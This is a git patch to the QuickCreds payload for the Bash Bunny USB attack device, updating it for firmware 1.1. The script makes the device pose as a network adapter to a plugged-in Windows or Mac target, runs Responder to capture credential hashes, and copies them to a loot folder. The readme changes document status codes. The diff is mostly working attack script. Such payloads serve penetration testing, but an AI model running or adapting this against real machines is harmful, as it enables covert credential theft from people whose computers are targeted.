From ce0c7d2dbd067260f10a13761e40321660bc79a2 Mon Sep 17 00:00:00 2001 From: hink Date: Sun, 9 Apr 2017 21:06:04 -0500 Subject: [PATCH] Updated QuickCreds payload for Bash Bunny v1.1 --- payloads/library/QuickCreds/payload.txt | 37 ++++++++++++------------- payloads/library/QuickCreds/readme.md | 18 ++++++------ 2 files changed, 27 insertions(+), 28 deletions(-) diff --git a/payloads/library/QuickCreds/payload.txt b/payloads/library/QuickCreds/payload.txt index cbc50154..663fda1e 100644 --- a/payloads/library/QuickCreds/payload.txt +++ b/payloads/library/QuickCreds/payload.txt @@ -3,37 +3,36 @@ # Title: Quick Creds # Author: Hak5Darren -- Cred: Mubix # Version: 1.0 +# Firmware: >= 1.1 # # Runs responder against target with specified options # Saves sequential logs to mass storage loot folder # -# Requires responder in /pentest/responder - run tools_installer payload first +# Requires responder in /tools/responder # -# White Blinking.....Dependencies not met. Responder not installed in /pentest -# Red ...............Setup -# Red Blinking.......Setup Failed. Target did not obtain IP address. Exit. -# Amber Blinking.....Scanning -# Green..............Finished +# | Status | Description | +# | ------------------- | ---------------------------------------- | +# | FAIL1 | Responder not found at /tools/responder | +# | FAIL2 | Target did not aquire IP address | +# All other LED statuses are standard to v1.1 # # Options RESPONDER_OPTIONS="-w -r -d -P" LOOTDIR=/root/udisk/loot/quickcreds -# Check for responder. If not found, blink WHITE and end. -if [ ! -d /pentest/responder/ ]; then - LED R G B 100 - exit 1 -fi +# Check for responder +REQUIRETOOL responder -# Set LED Red while setting up attack -LED R +# Setup Attack +LED SETUP # Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET ATTACKMODE RNDIS_ETHERNET #ATTACKMODE ECM_ETHERNET -# Source bunny_helpers.sh for functions & variables TARGET_IP, TARGET_HOSTNAME -source bunny_helpers.sh +# Set convenience variables +GET TARGET_HOSTNAME +GET TARGET_IP # Setup named logs in loot directory mkdir -p $LOOTDIR @@ -49,13 +48,13 @@ mkdir -p /root/loot/quickcreds/$HOST-$COUNT # Check target IP address. If unset, blink RED and end. if [ -z "${TARGET_IP}" ]; then - LED R 100 + LED FAIL2 exit 1 fi # Set LED yellow, run attack -LED G R 500 -cd /pentest/responder +LED ATTACK +cd /tools/responder # Clean logs directory rm logs/* @@ -78,4 +77,4 @@ cp logs/* $LOOTDIR/$HOST-$COUNT sync # Light turns green - trap is clean. -LED G \ No newline at end of file +LED FINISH \ No newline at end of file diff --git a/payloads/library/QuickCreds/readme.md b/payloads/library/QuickCreds/readme.md index 49aeb004..0271bce8 100644 --- a/payloads/library/QuickCreds/readme.md +++ b/payloads/library/QuickCreds/readme.md @@ -3,6 +3,7 @@ Author: Hak5Darren Version: Version 1.0 Credit: Mubix +Firmware: >= 1.1 ## Description @@ -17,18 +18,17 @@ Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/* ## Requirements -Responder must be in /pentest/responder/ -Run the latest tools_installer payload or manually install +Responder must be in /tools/responder/ ## STATUS -| LED | Status | -| ---------------- | ------------------------------------- | -| White (blinking) | Dependencies not met | -| Red | Setup | -| Red (blinking) | Setup Failed. Target didn't obtain IP | -| Amber | Responder running, waiting for creds | -| Green | Finished | + +| Status | Description | +| ------------------- | ---------------------------------------- | +| FAIL1 | Responder not found at /tools/responder | +| FAIL2 | Target did not aquire IP address | + +All other LED statuses are standard to v1.1 ## Discussion [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40226-payload-quickcreds/ "Hak5 Forum Thread")